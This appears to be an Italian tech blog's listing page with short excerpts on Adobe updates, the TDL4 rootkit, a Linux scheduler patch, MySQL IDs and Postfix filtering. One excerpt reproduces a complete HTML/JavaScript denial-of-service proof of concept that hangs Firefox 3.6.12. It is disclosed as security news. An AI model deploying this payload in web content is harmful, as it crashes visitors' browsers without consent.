-
Aggiornamento per Acrobat e Adobe Reader
Da ieri sera (ora europea) Adobe ha rilasciato gli aggiornamenti per Acrobat e Adobe Reader per Windows, UNIX e OSX. L’ultima versione di Adobe Reader è, quindi, la 9.4.1 ed è l’unica a non essere interessata dai problemi scoperti a fine ottobre.
-
Rootkit che bypassa la protezione della firma digitale dei driver Windows
TDL4 è la nuova versione di una famiglia di rootkit già noti che abbassa le difese di Windows a 64 bit contro il caricamento nel kernel di driver non firmati. La prima parte del malware si annida nel MBR e modifica in memoria il parametro del kernel LoadIntegrityCheckPolicy e fa in modo che vengano accettati…
-
200 righe di patch che fanno la differenza
Linux è abbastanza consolidato nell’ambiente server, ma deve ancora crescere come kernel adatto ad un utilizzo interattivo al di fuori degli smanettoni. Negli ultimi mesi sono state proposte molte patch al kernel per migliorare la risposta interattiva del sistema. Mike Galbraith ha proposto una patch basata su un’idea di Linus Torvalds che sembrerebbe fare davvero…
-
Id autoincrementale delle tabelle MySQL
Premetto che sono un fan sfegatato degli id interi autoincrementali delle tabelle SQL usati come chiave primaria. Prima o poi tornano utili e fanno comunque comodo. Un collega qualche giorno fa mi ha detto di essere un po’ perplesso degli id autoincrementali per via del rischio di overflow. MySQL, infatti, in caso di raggiungimento del…
-
0day di Mozilla Firefox 3.6.12
<!– 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele ‘emgent’ Gentili <emgent@backtrack-linux.org> Marco ‘white_sheep’ Rondini <white_sheep@backtrack-linux.org> Alessandro ‘scox’ Scoscia <scox@backtrack.it> –> <script>document.write(“\u0000\u0001\u0002\u0003\u0004\u0005”)</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write(“a”); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script> Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su…
-
“L’Open Source non inventa.”
Sedetevi su una sedia prima di leggere questa frase. E’ meglio. “L’Open Source non inventa. Copia e rende libero ciò che altri inventano per evitare che Microsoft copiando e *rubando* diventi padrona di tutto. Dei due mali, io preferisco la via di mezzo: il giusto guadagno ma il buon prodotto.” Questa è una delle frasi…
-
Aggiornamento di Flash per oggi
Contrariamente a quanto annunciato in precedenza, Adobe rilascerà nella giornata di oggi (riferita alla time zone americana) un aggiornamento di Flash per Windows, Unix e MacOS che dovrebbe risolvere un problema critico, in quanto è già in circolazione del malware che lo sfrutta. L’aggiornamento per Android è previsto per il 9 di questo mese. Aspettatevi,…
-
Postfix: bloccare le mailing list hackerate
Capita ogni tanto di dover bloccare un flusso cospicuo di mail in arrivo da un indirizzo o una mailing list hackerata o che rifiuta il comando di disiscrizione e di doverlo fare adesso. I filtri applicati ai client possono essere efficaci, ma non comunicano al mittente la nostra intenzione di non voler ricevere più i…
-
La Guardia di Finanza usa il comando JOIN
Per chi si diletta di database può sembrare una cosa ovvia, per le Fiamme Gialle probabilmente non lo era o, verosimilmente, non avevano ancora gli strumenti necessari. Sia chiaro: chi scrive accoglie con sentimenti assolutamente positivi queste iniziative e riconosce, per esperienza, che non sia così facile mettere assieme dati in maniera coerente provenienti da…
-
Un’altra vulnerabilità critica dei prodotti Adobe
È in circolazione del malware che sfrutta una vulnerabilità di Acrobat Reader appena scoperta. La vulnerabilità interessa i file PDF che includono contenuti in Flash visualizzati attraverso Acrobat Reader. I prodotti interessati sono: Flash Player versione 10.1.85.3 e precedenti per Windows, MacOS, Linux e Solaris Flash Player versione 10.1.95.2 e precedenti per Android Adobe Reader…